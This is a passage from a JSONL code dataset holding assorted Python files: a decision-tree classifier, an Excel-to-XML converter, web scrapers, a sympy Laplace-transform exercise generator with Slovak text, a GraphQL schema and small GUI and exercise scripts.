'/'.join(service_action)\n\n\t\t\t\t\t\t## Expose depending on security profile\n\t\t\t\t\t\tif security_profile['expose'] == 'all':\n\t\t\t\t\t\t\tsvcs.append((name, service_action_url, config, opts))\n\n\t\t\t\t\t\telif security_profile['expose'] == 'admin':\n\t\t\t\t\t\t\tif users.is_current_user_admin():\n\t\t\t\t\t\t\t\tsvcs.append((name, service_action_url, config, opts))\n\t\t\t\t\t\t\n\t\t\t\t\t\telif security_profile['expose'] == 'none':\n\t\t\t\t\t\t\tcontinue\n\t\t\n\t\t\t\tjsapi = self.render('snippets/page_object.js', services=svcs, content_type='text/javascript', script_tag=False)\n\t\t\t\tmemcache.set('jsapi-main', jsapi)\n\t\t\t\tjsapi_cache = jsapi\n\t\t\t\treturn jsapi","sub_path":"app/momentum/fatcatmap/handlers/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"56678257","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn import metrics\nimport Classification_utils\n\ndataset = pd.read_csv('../data/combinedData.csv')\ntargets = pd.read_csv('../data/targets.csv')\ndrop_ids = ['Chart_12','Chart_23',\n 'Closure_28','Closure_43','Closure_46','Closure_90',\n 'Lang_23','Lang_25','Lang_56',\n 'Math_12','Math_35','Math_61','Math_104',\n 'Time_2','Time_11', 'Time_23', 'Mockito_1','Mockito_2','Mockito_3',\n 'Mockito_4','Mockito_5','Mockito_6','Mockito_7','Mockito_8','Mockito_9',\n 'Mockito_10','Mockito_11','Mockito_12','Mockito_13','Mockito_14',\n 
'Mockito_15','Mockito_16','Mockito_17','Mockito_18','Mockito_19',\n 'Mockito_20','Mockito_21','Mockito_22','Mockito_23','Mockito_24',\n 'Mockito_25','Mockito_26','Mockito_27','Mockito_28','Mockito_29',\n 'Mockito_30','Mockito_31','Mockito_32','Mockito_33','Mockito_34',\n 'Mockito_35','Mockito_36','Mockito_37', 'Mockito_38']\ndataset = dataset.query('id not in @drop_ids')\ndataset.sort_values('id', inplace=True)\ndataset.reset_index(drop=True, inplace=True)\nX = dataset.drop('id', axis=1)\n\ntargets = targets.query('id not in @drop_ids')\ntargets.sort_values('id', inplace=True)\ntargets.reset_index(drop=True, inplace=True)\ny = targets['nr_to_examine_dstar_2']\ny = Classification_utils.get_class_labels_coarse_grained(y)\nclass_names = Classification_utils.get_coarse_grained_class_names()\n#cc.print_iterable(y)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n\nimp = Imputer(missing_values=\"NaN\", strategy=\"mean\", axis=0)\nX_train = imp.fit_transform(X_train)\nX_test = imp.fit_transform(X_test)\n\ntree = DecisionTreeClassifier(max_depth=3, min_weight_fraction_leaf=0.05)\nprint('F1 scores during cross validation')\nscores = cross_val_score(estimator=tree, X=X_train, y=y_train, scoring='f1')\nprint(scores)\n\ntree.fit(X_train, y_train)\ny_pred = tree.predict(X_test)\n\nprint('-------Score on training data')\nprint(tree.score(X_train, y_train))\nprint('********************* Scores on the test set *********************')\nprint('F1 score [0, 1]')\nprint(metrics.f1_score(y_test, y_pred))\nprint('Accuracy score (fraction and number of correct predictions)')\nprint(metrics.accuracy_score(y_test, y_pred))\nprint(metrics.accuracy_score(y_test, y_pred, normalize=False))\n\nimport plot_confusion_matrix as plt_cm\ncm = metrics.confusion_matrix(y_test, y_pred)\nplt_cm.plot_confusion_matrix(cm, classes=class_names,\n title='Confusion Matrix')\nplt_cm.plot_confusion_matrix(cm, classes=class_names,\n title='Normalized Confusion Matrix',\n normalize=True)\n\nfrom sklearn.tree import export_graphviz\nexport_graphviz(tree, out_file='../results/decisionTree/classification_tree.dot',\n feature_names=X.columns,\n filled=True, rounded=True,\n special_characters=True)\n","sub_path":"DecisionTree/DecisionTreeClassification_coarseGrained.py","file_name":"DecisionTreeClassification_coarseGrained.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"510786471","text":"import sys\r\nimport converter\r\nimport os\r\nimport glob\r\nimport datetime\r\nimport random\r\nimport shutil\r\n\r\ninput_path = sys.argv[1]\r\noutput_path = sys.argv[2]\r\nerror_dir = sys.argv[3]\r\narchival_dir = sys.argv[4]\r\nenv = sys.argv[5]\r\n\r\n#find the newest file in the input directory\r\nfiles = glob.glob(input_path + '\\\\*.[Xx][Ll][Ss][Xx]')\r\nif len(files) == 0:\r\n    print('Nothing to do here, no files')\r\n    exit(0) \r\ninput_path = max(files,key=os.path.getctime)\r\ntd = datetime.datetime.today()\r\noutput_filename = 'filename' + '.xml'\r\n\r\n#raises if file is open\r\ntry: \r\n    input_path_temp = input_path + 'temp'\r\n    os.rename(input_path, input_path_temp)\r\n    os.rename(input_path_temp, input_path)\r\nexcept OSError:\r\n    print(\"Input file is open: \" + input_path)\r\n    print(\"Can't move input file, please instruct to close file\")\r\n\r\n    raise\r\n###\r\nxl_filename = output_filename[:-4] + '.xlsx'\r\nxml_filepath = output_path+ '\\\\' + output_filename\r\ntry:\r\n    with 
open(xml_filepath,'wb') as f:\r\n \r\n contents = converter.convert_to_xml(input_path)\r\n f.write(contents)\r\n\r\n print('success! Moving file to :' + xml_filepath)\r\n shutil.copyfile(input_path,archival_dir + '\\\\' + xl_filename)\r\nexcept:\r\n print('error when converting excel to xml')\r\n shutil.copyfile(input_path, error_dir + '\\\\' + xl_filename)\r\n print(\"file moved to error folder:\" + error_dir)\r\n raise\r\nfinally:\r\n os.remove(input_path)\r\n \r\n\t\r\n# Error handling: I am assuming that exceptions raised by any part of the code\r\n","sub_path":"converterTool.py","file_name":"converterTool.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"146545016","text":"import requests as rq\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium import webdriver\nimport time\n\n\nurl = \"https://data.kma.go.kr/data/mrz/mrzRltmList.do?pgmNo=645\"\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument(\"--single-process\")\nchrome_options.add_argument(\"--disable-dev-shm-usage\")\n\n\nchrome_driver_path =(r\"/home/ubuntu/hanium-seungsoo/map/grid/chromedriver\")\ndriver = webdriver.Chrome(chrome_driver_path, options=chrome_options)\ndriver.get(url)\n\n\nhtml = driver.page_source\nsoup = BeautifulSoup(html, 'html.parser')\n\n#tbl = soup.find('table','tbl')\n#print(tbl.get_text())\n#print(type(tbl))\n\ntable00 = pd.read_html(url)\ndf00 = pd.DataFrame(table00[0])\nprint(df00)\ndf00.to_csv('df/df00.csv', encoding='utf-8')\n\n\n#버튼 클릭 이벤트(03시 조회)\nhbutton = driver.find_element_by_link_text(\"h003\")\nprint(hbutton)\nhbutton.click()\n\nsearchbutton = driver.find_element_by_css_selector(\"#dsForm > div.wrap_btn > button\")\nprint(searchbutton)\nsearchbutton.click()\ntbl = soup.find('table','tbl')\ntb_text = tbl.get_text()\nprint(tb_text)\nprint(type(tb_text))\n\ndf03 = pd.DataFrame([x.split('\\n') for x in tb_text.split('\\n\\n')])\nprint(df03[0:6].head(2)) \n\n\n\n#table03 = pd.read_html(url)\n#df03 = pd.DataFrame(table03[0])\n#print(df03)\n#df03.to_csv('df/df03.csv', encoding='utf-8')\n\n","sub_path":"grid/py_crawling.py","file_name":"py_crawling.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"358599393","text":"# not IPython notebook\nimport matplotlib\nmatplotlib.use('PDF')\nmatplotlib.rcParams['font.size'] = 18\nmatplotlib.rcParams['axes.titlesize'] = 18\nfrom sympy import symbols, Heaviside as H, factor, apart, latex, Function, diff, expand_mul\nfrom sympy import laplace_transform as LT,inverse_laplace_transform as ILT, plot, simplify\nfrom sympy import Basic, Rational, collect, solve, numer, denom, init_printing\nfrom random import choice\nfrom numpy import poly, array, linspace\nfrom tempfile import mkstemp\n\ny,Y = symbols(\"y,Y\", cls=Function)\nt = symbols(\"t\", positive=True)\ns = symbols(\"s\")\ny1,y2 = symbols(\"y_1,y_2\", cls=Function)\n\n\ndef choice_except(a,b,exvals=None):\n R = range(a,b+1)\n if exvals:\n R = set(R) - set(exvals) \n return choice(list(R))\n\ndef to_str(n):\n if abs(n) !=1:\n return \"%+d \\,\" %n\n else:\n return \"+\" if n==1 else \"-\" \n\ndef odelatex(a2,a1,a0):\n s=\"%d \\, y''(t)\" %a2 if abs(a2)!=1 else (\"y''(t)\" if a2==1 else \"-y''(t)\")\n if a1:\n s = s + \"%s y'(t)\" %to_str(a1)\n if a0: \n s = s + \"%s y(t)\" %to_str(a0)\n 
return s\n\ndef params(realroots=True,continuous=False):\n r1,r2=choice_except(-4,-1),choice_except(-3,0)\n if not realroots:\n if r2 == 0:\n r2=choice_except(-3,-1)\n kk1=complex(r1,r2); kk2=complex(r1,-r2)\n r1,r2=kk1,kk2\n cp=poly((r1,r2))\n brk1,brk2 = choice([1,2,3]),choice([4,5,6])\n k1 = choice_except(1,3)\n if not continuous:\n k2 = choice_except(-3,-1)\n else:\n k2 = Rational(-k1*brk1,brk2-brk1)\n y0 = choice_except(-2,2)\n yd0 = choice_except(-2,2,(0,)) if (y0==0) else choice_except(-2,2)\n return cp,(brk1,brk2),(k1,k2),(y0,yd0)\n\n\ndef ilt_pfe(Lpf):\n Ife = []\n for pf in Lpf:\n Ife.append(ILT(pf,s,t))\n return sum(Ife)\n\n\ndef apart_fact(Fs):\n S=0\n Ls = apart(Fs).as_ordered_terms()\n for l in Ls:\n S += numer(l)/factor(denom(l))\n return expand_mul(S)\n\n\ndef solution(pars):\n (a2,a1,a0),(t1,t2),(k1,k2),(y0,yd0)=pars\n a2,a1,a0 = map(int,[a2,a1,a0])\n den = a2*s**2+a1*s+a0\n V1 = apart(1/s/den).as_ordered_terms() # const.\n V2 = apart(1/s**2/den).as_ordered_terms() # lin.\n Iv1,Iv2 = ilt_pfe(V1),ilt_pfe(V2)\n LIC = (a2*(s*y0+yd0) + a1*y0)/den\n y1 = ILT(LIC, s,t)\n y2 = k1*Iv2 # k1, t\n y3 = (k2-k1)*Iv2.subs(t,t-t1)*H(t-t1) # k2-k1,(t-t1)*H(t-t1)\n y4 = (t1*(k2-k1)-k2*t2)*Iv1.subs(t,t-t1)*H(t-t1) # t1*(k2-k1)-k2*t2,H(t-t1), nulove pre spojite\n y5 = -k2*Iv2.subs(t,t-t2)*H(t-t2) # -k2, (t-t2)*H(t-t2)\n y = expand_mul(simplify(y1+y2+y3+y4+y5))\n return y\n\n\ndef formulation(pars):\n (a2,a1,a0),(t1,t2),(k1,k2),(y0,yd0)=pars\n # a2,a1,a0 = map(int,[a2,a1,a0])\n # LS = latex(a2*diff(y(t),t,2) + a1*diff(y(t),t) + a0*y(t),order='rev-lex')\n LS = odelatex(a2,a1,a0)\n f1, f2 = latex(k1*t), latex(-k2*(t2-t))\n Zstr=r\"\"\"Riešme rovnicu $%s = f(t)$ s počiatočnými podmienkami\n $$y(0)=%d,\\, y'(0)=%d.$$ \n Pravá strana $f(t)$ je daná rovnicami:\n $$f(t)=\\left\\{{\n \\begin{array}{ll}\n %s & \\mbox{ pre } 0\\le t \\le %d,\\\\\n \\displaystyle{%s} & \\mbox{ pre } %d < t \\le %d,\\\\\n %s & \\mbox{ pre } t \\ge %d.\n \\end{array}\n }\\right. 
$$\n \"\"\" %(LS,y0,yd0,f1,t1,f2,t1,t2,latex(0),t2)\n return Zstr\n\n\ndef plotexprt(ft,sings=[],depth=10,xlabel='t',ylabel='y(t)'):\n P=plot(ft,singularities=sings,depth=depth,xlabel=xlabel,ylabel=ylabel)\n\ndef plotnp(ft,t1,t2, xlab=r'$t$',ylab=r'$y(t)$',npts=200):\n tn = linspace(t1,t2,npts)\n yn = array([ft(ta) for ta in tn],dtype='float')\n plot(tn,yn)\n xlabel(xlab); ylabel(ylab)\n\ndef explanation(pars,for_tex=False):\n (a2,a1,a0),(t1,t2),(k1,k2),(y0,yd0)=pars\n a2,a1,a0 = map(int,[a2,a1,a0])\n Chpol = a2*s**2+a1*s+a0\n r12 = solve(Chpol,s)\n if len(r12)==2:\n r1,r2=r12\n else:\n r1=r12[0]; r2=r1\n # nezavisle od parametrov \n realroots = (complex(r1).imag == 0)\n kps = t1*(k2-k1)-k2*t2\n continuous = (kps == 0)\n \n if not for_tex:\n beg_eqn = r\"$$\\begin{eqnarray*}\"\n end_eqn = r\"\\end{eqnarray*}$$\"\n else:\n beg_eqn = r\"\\begin{eqnarray*}\"\n end_eqn = r\"\\end{eqnarray*}\" \n Lls = Chpol * Y(s)\n IC = a1*y0+s*y0+yd0\n ict = IC/Chpol\n y0t = simplify(ILT(ict,s,t))\n if realroots:\n y0t = H(t)*expand_mul(simplify(y0t/H(t)))\n if not continuous:\n V1 = apart(1/s/Chpol).as_ordered_terms()\n Iv1 = ilt_pfe(V1)\n y1t = expand_mul(simplify(Iv1/H(t)))\n V2 = apart(1/s**2/Chpol).as_ordered_terms(); Iv2 = ilt_pfe(V2)\n y2t = expand_mul(simplify(Iv2/H(t)))\n if realroots:\n icpfe=latex(apart_fact(ict))\n else:\n icpfe=latex(ict)\n if not continuous:\n Ykstr=r\"\"\"%s\n Y_0(s) &=& %s,\\\\\n Y_1(s) &=& \\frac{1}{s (%s)},\\\\ \n Y_2(s) &=& \\frac{1}{s^2 (%s)}.\\\\\n %s\"\"\" %(beg_eqn,latex(ict),latex(Chpol),latex(Chpol),end_eqn)\n ytstr=r\"\"\"%s\n y_0(t) &=& %s,\\\\ \n y_1(t) &=& \\theta(t) \\left({%s}\\right),\\\\\n y_2(t) &=& \\theta(t) \\left({%s}\\right).\\\\\n %s\"\"\" %(beg_eqn,latex(y0t,fold_func_brackets=True), \n latex(y1t,fold_func_brackets=True),\n latex(y2t,fold_func_brackets=True),end_eqn)\n pfestr=r\"\"\"%s\n Y_0(s) &=& %s,\\\\\n Y_1(s) &=& %s,\\\\ \n Y_2(s) &=& %s.\\\\\n %s\"\"\" %(beg_eqn,icpfe,latex(apart(1/s/Chpol)),latex(apart(1/s**2/Chpol)),end_eqn) \n else:\n Ykstr=r\"$$Y_0(s) = %s,\\ Y_1(s) = \\frac{1}{s^2 (%s)}.$$\" %(latex(ict),latex(Chpol))\n ytstr=r\"\"\"%s\n y_0(t) &=& %s,\\\\\n y_1(t) &=& \\theta(t) \\left({%s}\\right).\\\\\n %s\"\"\" %(beg_eqn,latex(y0t,fold_func_brackets=True),\n latex(y2t,fold_func_brackets=True),end_eqn)\n pfestr=r\"$$Y_0(s) =%s,\\ Y_1(s) = %s.$$\" %(icpfe,latex(apart_fact(1/s**2/Chpol)))\n ic1,ic2 = s*Y(s)- y0, s**2*Y(s) - y0*s - yd0\n f = k1*t*(H(t)-H(t-t1))+k2*(t-t2)*(H(t-t1)-H(t-t2))\n ct1,ct2=factor((k2-k1)*(t-t1)),factor(-k2*(t-t2))\n fh =k1*t*H(t)+ct1*H(t-t1)+ct2*H(t-t2)\n if not continuous:\n fh = fh + kps*H(t-t1)\n Lfh = expand_mul(LT(fh,t,s)[0])\n y2t1 = y2t.subs(t,t-t1); y2t2 = y2t.subs(t,t-t2)\n if not continuous:\n y1t1 = y1t.subs(t,t-t1)\n yt = y0t + k1*y2t + (k2-k1)*y2t1*H(t-t1) - k2*y2t2*H(t-t2)\n if not continuous:\n yt = yt + kps*y1t1*H(t-t1)\n yder = diff(y0t/H(t),t)*H(t) + k1*diff(y2t,t)*H(t)+(k2-k1)*diff(y2t1,t)*H(t-t1)-k2*diff(y2t2,t)*H(t-t2)\n if not continuous:\n yder = yder + kps*diff(y1t1,t)*H(t-t1)\n \n yder2 = diff(y0t/H(t),t,2)*H(t) + k1*diff(y2t,t,2)*H(t)+(k2-k1)*diff(y2t1,t,2)*H(t-t1)-k2*diff(y2t2,t,2)*H(t-t2)\n if not continuous:\n yder2 = yder2 + kps*diff(y1t1,t,2)*H(t-t1)\n if continuous: \n sol2 = latex(k1 * y1(t) + (k2-k1)*y1(t-t1) - k2 * y1(t-t2))\n else:\n sol2 = latex(k1 * y2(t) + (k2-k1)*y2(t-t1) - k2 * y2(t-t2) + kps*y1(t-t1))\n sol2 = sol2.replace('\\\\operatorname','')\n if kps < 0:\n SolStr = \"y(t) = y_0(t) \" + sol2\n else: \n SolStr = \"y(t) = y_0(t) + \" + sol2\n \n 
Fcheck=a2*yder2+a1*yder+a0*yt\n Is_solution=simplify(Fcheck-f)\n Estr=[r\"\"\"Nech $y(t) \\rightarrow Y(s)$. Pre transformáciu ľavej strany použijeme vzorce:\n %s\n y'(t) &\\rightarrow & s Y(s)- y(0)=%s,\\\\ \n y''(t) &\\rightarrow & s^2 Y(s) - s y(0) -y'(0)= %s.\\\\\n %s\"\"\" %(beg_eqn,latex(ic1), latex(ic2),end_eqn),\n r\"\"\"Pravú stranu prepíšeme pomocou Heavisideovho skoku $\\theta(t)\\,$ takto:\n $$f(t)=%s.$$\n Keď chceme mať rovnaké posunutia vo funkcii aj v Heavisidovom skoku, upravíme to\n $$f(t)=%s.$$\n Je to treba kvôli použitiu pravidla o posunutí originálu\n $$\\mbox{ ak } f(t) \\rightarrow F(s), \n \\mbox{ potom } f(t-a) \\rightarrow \\mathrm{e}^{-a s} F(s),$$\n pre transformáciu pravej strany.\n Teraz môžeme napísať L-transformovanú rovnicu (nezlomkové členy vznikli z počiatočných podmienok, ktoré sme zahrnuli do pravej strany):\n $$%s = %s.$$\n \"\"\" %(latex(f),latex(fh),latex(Lls),latex(Lfh +a1*y0 +s* y0 + yd0)),\n r\"\"\"Korene charakteristickej rovnice sú $r_1=%s,\\, r_2=%s.$\n Vzhľadom na horeuvedené pravidlo o posunutí originálu a linearitu L-transformácie \n stačí hľadať originály len pre výrazy %s\n Urobili by sme to rozkladom na elementárne zlomky, ale robotu nám ušetrí softvér\n ($\\textit{sympy}$) a dostaneme %s\n Pre originály máme %s\n Nakoniec, použitím pravidla o posunutí a linearity L-transformácie dostaneme celkové riešenie\n $$%s.$$ \n Pomocou $\\textit{sympy}$ overíme, či je to riešenie. Je, lebo rozdiel ľavej a pravej strany je $%s$.\n \"\"\" %(latex(r1),latex(r2),Ykstr, pfestr, ytstr, SolStr, latex(Is_solution))\n ]\n return Estr[0]+Estr[1]+Estr[2], t1, t2, f, yt, yder, yder2 \n\ndef save_plots(t1,t2,f,yt,yder,yder2):\n Pf = plot((f,(t,0,t2+1)),title=r\"$f(t)$\",xlabel=\"\",ylabel=\"\",show=False) # vypis formulacie\n Py = plot((yt,(t,0,t2+1)),depth=12,title=r\"$y(t)$\",xlabel=\"\",ylabel=\"\",show=False)\n Pdy = plot((yder,(t,0,t2+1)),title=r\"$y'(t)$\",xlabel=\"\",ylabel=\"\",show=False)\n Pddy = plot((yder2,(t,0,t2+1)),sings=[t1,t2],title=r\"$y''(t)$\",xlabel=\"\",ylabel=\"\",show=False)\n ffn = mkstemp(suffix=\".pdf\",dir=\".\")[1]\n yfn = mkstemp(suffix=\".pdf\",dir=\".\")[1]\n dyfn = mkstemp(suffix=\".pdf\",dir=\".\")[1]\n ddyfn = mkstemp(suffix=\".pdf\",dir=\".\")[1]\n Pf.save(ffn)\n Py.save(yfn)\n Pdy.save(dyfn)\n Pddy.save(ddyfn)\n return ffn, yfn, dyfn, ddyfn\n\ndef plot_riesenie(t1,t2,yt,yder,yder2):\n Py = plot((yt,(t,0,t2+1)),depth=12,title=r\"$y(t)$\",xlabel=\"\",ylabel=\"\")\n Pdy = plot((yder,(t,0,t2+1)),title=r\"$y'(t)$\",xlabel=\"\",ylabel=\"\")\n Pddy = plot((yder2,(t,0,t2+1)),sings=[t1,t2],title=r\"$y''(t)$\",xlabel=\"\",ylabel=\"\")\n\ndef to_latex(pars,fname=\"odediscont.tex\"):\n Z = formulation(pars)\n Estr, t1, t2, f, yt, yder, yder2 = explanation(pars,for_tex=True)\n ffn, yfn, dyfn, ddyfn = save_plots(t1, t2, f, yt, yder, yder2)\n header = r\"\"\"\\documentclass[a4paper,10pt]{article}\n \\usepackage[utf8]{inputenc}\n \\usepackage[T1]{fontenc}\n \\usepackage[slovak]{babel}\n \\usepackage{a4wide}\n \\usepackage{graphicx}\n \\begin{document}\n \n \\noindent\n \"\"\"\n LtxStr=header + Z + Estr\n of = open(fname,'w')\n of.write(LtxStr)\n of.flush()\n PlotStr=r\"\"\"\\begin{figure}\n \\includegraphics[width=0.45\\textwidth]{%s}\n \\includegraphics[width=0.45\\textwidth]{%s}\n \\caption{Pravá strana a riešenie.}\n \\end{figure}\n \\begin{figure}\n \\includegraphics[width=0.45\\textwidth]{%s}\n \\includegraphics[width=0.45\\textwidth]{%s}\n \\caption{Prvá a druhá derivácia riešenia.}\n \\end{figure} \n \"\"\" % (ffn, yfn, dyfn, 
ddyfn)\n of.write(PlotStr + r\"\\end{document}\") \n of.close()\n ","sub_path":"ode_lap_discont.py","file_name":"ode_lap_discont.py","file_ext":"py","file_size_in_byte":10881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"401441448","text":"from random import randint \ndef rzucKostka():\n rzut = randint(1,6)\n return rzut\noczko = 0\nsuma = 0\nfor i in range(3):\n oczko = rzucKostka()\n suma += oczko\n print(oczko,end=' ')\nprint(f'Suma: {suma}')","sub_path":"04-Subroutines/dc_17.py","file_name":"dc_17.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"344117758","text":"import graphene \nfrom graphene_django import DjangoObjectType\nfrom rest.models import Students,School\nimport json\n# from django.core import serializers\n\nclass StudentsType(DjangoObjectType):\n class Meta:\n model=Students\n\nclass SchoolType(DjangoObjectType):\n class Meta:\n model=School\n\nclass Query(graphene.ObjectType):\n AllStudents=graphene.List(StudentsType,Sname=graphene.String())\n\n AllSchools=graphene.List(SchoolType)\n\n\n def resolve_AllSchools(root,info):\n return School.objects.all()\n\n def resolve_AllStudents(root,info, Sname):\n print(Sname,\"dggggggggdg\")\n return Students.objects.all()\n\n\nclass CreateStudent(graphene.Mutation):\n class Arguments:\n sname=graphene.String()\n sage=graphene.Int()\n std=graphene.Int()\n school=graphene.String()\n \n ok=graphene.Boolean()\n data=graphene.Field(StudentsType)\n\n def mutate(self, info, sname,sage,std,school):\n scl=School.objects.get(name=school)\n v1=Students(name=sname,age=sage,standard=std,school=scl)\n v1.save() \n data=v1\n ok=True\n return CreateStudent(ok=ok,data=data)\n\n\n\nclass Mutation(graphene.ObjectType):\n newStudent=CreateStudent.Field()\n\nschema=graphene.Schema(query=Query,mutation=Mutation)\n\n","sub_path":"endpoint/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"216970504","text":"import requests\n\nfrom prototypes.Setting import Setting\nfrom prototypes.cell.Cell import Cell\nfrom utils.Exceptions import UrlNotSetException\n\n\nclass Requestor(Cell):\n\n def __init__(self, identifier='Unknown', input_cell=None, input_cells=None,\n url='http://www.baidu.com', params=None, timeout=1, proxy=None):\n \"\"\"\n Requestor unit for collect data.\n :param url:\n :param params:\n :param timeout:\n :param proxy:\n -\n inflow: __hash (url / params / proxy)\n outflow: __selector / __hash (/ response)\n \"\"\"\n super().__init__(identifier, input_cell=input_cell, input_cells=input_cells)\n self.load_selector()\n if not params:\n params = {}\n self.setting = Setting(url=url, params=params, timeout=timeout, proxy=proxy)\n\n def filter(self, data):\n response = self.__request(**data)\n __hash = data.get('__hash')\n if response and response.status_code == 200:\n return {\n '__selector': 'default',\n '__hash': __hash,\n 'response': response\n }\n else:\n return {\n '__selector': 'fail',\n '__hash': __hash\n }\n\n def __request(self, url=None, params=None, proxy=None, **kwargs):\n __url = url if url else self.setting.get('url')\n __params = dict(self.setting.get('params'))\n if params:\n __params.update(params)\n __timeout = self.setting.get('timeout')\n __proxy = proxy if proxy else self.setting.get('proxy')\n try:\n if not __url:\n raise UrlNotSetException\n 
response = requests.get(url=__url, params=__params, timeout=__timeout, proxies=__proxy)\n            return response\n        except Exception as e:\n            self.raise_exception(e)\n","sub_path":"prototypes/cell/Requestor.py","file_name":"Requestor.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"461722923","text":"#-*-coding:utf-8-*-\n\"\"\"\nThis code is utf8\n\"\"\"\nimport imp\nimport json\nimport urllib2\nimport os\nimport sys\nfrom thePath import rootPath\nsys.path.append(rootPath + \"lib\")\nfrom superLogger import Logger\n\nclass GQBT(object):\n    \"\"\"\n    This is the GQBT spider class\n    \"\"\"\n    def __init__(self):\n        self.useragent = (\"Mozilla/5.0 (Linux; Android 6.0;\"\n                          \" Nexus 5 Build/MRA58N) AppleWebKit/537.36\"\n                          \" (KHTML, like Gecko) \"\n                          \"Chrome/60.0.3112.113 Mobile Safari/537.36\")\n        self.headers = {'User-Agent':self.useragent}\n        B = imp.load_source('Directory', rootPath + \\\n            'script/siteproc/car_4s/lib/Directory.py')\n        class_drectory = B.GetDir()\n        self.outFile = class_drectory.getDirectory()+\"GQBT.json\"\n        self.loginfo = Logger(rootPath + \\\n            \"temp/debugLog/\", \"CAR4S\")\n    \n    def getHtml(self, url):\n        \"\"\"\n        This function is to get html from url\n        Args:\n            url\n        Return:\n            page code\n        \"\"\"\n        try:\n            request = urllib2.Request(url, headers = self.headers)\n            response = urllib2.urlopen(request)\n            pageCode = response.read()\n            return pageCode\n        except urllib2.URLError as e:\n            if hasattr(e, \"reason\"):\n                self.loginfo.error(e)\n            return None\n    \n    def saveFile(self, item):\n        \"\"\"\n        This saves one item to the output file as a JSON line\n        \"\"\"\n        fp = open(self.outFile, 'a')\n        li = json.dumps(item, ensure_ascii=False) + '\\n'\n        fp.write(li.encode('utf8'))\n        fp.close()\n    \n    def saveText(self, strbject):\n        \"\"\"\n        This saves raw text lines to the output file\n        \"\"\"\n        s = strbject.split(\"\\n\")\n        for sdata in s:\n            fp = open(self.outFile, 'a')\n            fp.write(sdata + \"\\n\")\n            fp.close()\n    \n    def getPageItems(self, url):\n        \"\"\"\n        This function is to get page items\n        Args:\n            url\n        Return:\n            json data\n        \"\"\"\n        pageCode = self.getHtml(url) \n        if not pageCode:\n            self.loginfo.error('GQBT page is null')\n            return\n        strpage = pageCode.split(\"var global_dealers_data =\")\n        str1 = strpage[1]\n        str2 = str1.split(\"var AllCar_data=\")\n        str3 = str2[0]\n        pageItem = str3[1:len(str3)-4]\n        pa = pageItem.replace(\"},{\", \"}\\n{\")\n        s = pa.split(\"\\n\")\n        for sdata in s:\n            self.saveText(sdata)\n    \n    def main_spider(self):\n        \"\"\"\n        This is the main spider entry point\n        \"\"\"\n        if os.path.exists(self.outFile):\n            os.system(\"rm \" + self.outFile)\n        self.loginfo.debug('the GQBT is doing crawling')\n        self.getPageItems(\"http://www.ghac.cn/js/Official/staticData/p_c_dealers_data.js\")\n        self.loginfo.debug('the GQBT is done crawling')\n\n\nif __name__ == '__main__':\n    spider = GQBT()\n    spider.main_spider()\n\n","sub_path":"script/Guangqibentian.py","file_name":"Guangqibentian.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"197077628","text":"import PySimpleGUI as sg\nfrom src.windows.Utilidades import buttons\n\ndef build():\n\n    pad = ((20,0),(0,20))\n\n    l_cont = [\n        [sg.Text(\"MENU\", font=(\"Verdana\", 25), text_color=\"#f3f4ed\", background_color=\"#536162\",pad = ((0,0),(20,16)), size = (20,1), justification = \"c\" )],\n        buttons(\"JUGAR\",17,\"-JUGAR-\",pad = pad),\n        buttons(\"CONFIGURACIONES\",17,\"-CONFIGURACIONES-\",pad = pad),\n        buttons(\"TABLA DE 
PUNTOS\",17,\"-TABLA_PUNTOS-\",pad = pad),\n buttons(\"ESTADISTICAS\",17,\"-ESTADISTICAS-\",pad = pad),\n buttons(\"REGLAS\",17,\"-REGLAS-\",pad = pad),\n buttons(\"AYUDA\",17,\"-AYUDA-\",pad = pad),\n buttons(\"SALIR\",17,\"-SALIR-\",pad = pad),\n ]\n\n layout = [\n [sg.Text(\"MemPy\", font=(\"Helvetica\", 45), text_color=\"#f3f4ed\",background_color=\"#424642\",pad = ((0,0),(0,20)) )],\n [sg.Column(l_cont, background_color=\"#536162\", element_justification=\"l\", pad=(0,0))]\n ]\n\n return sg.Window(\"MemPy\", layout,background_color=\"#424642\", element_justification=\"c\", margins = (20,20))\n\n\n\"\"\"window = build()\nwhile True:\n event, values = window.read()\n if event == \"OK\" or event == sg.WIN_CLOSED:\n break\nwindow.close()\"\"\"","sub_path":"ActividadGrupal1/src/windows/v_menu.py","file_name":"v_menu.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"578924454","text":"def MaximumDiscount(N, price):\n #print(price)\n\n a = discount_all(price)\n\n b = summ_discount(a)\n #print('summ discount for price= ', b)\n c = discount_without(price)\n t = summ_discount(c)\n #print('summ discount for /3= ',t)\n if b > t:\n return b\n elif t > b or t == b:\n return t\n\n\ndef discount_without(price): # сортирует price по убыванию и разбивает price на price_mod по 3 вещи\n\n price2 = sort_price(price)\n 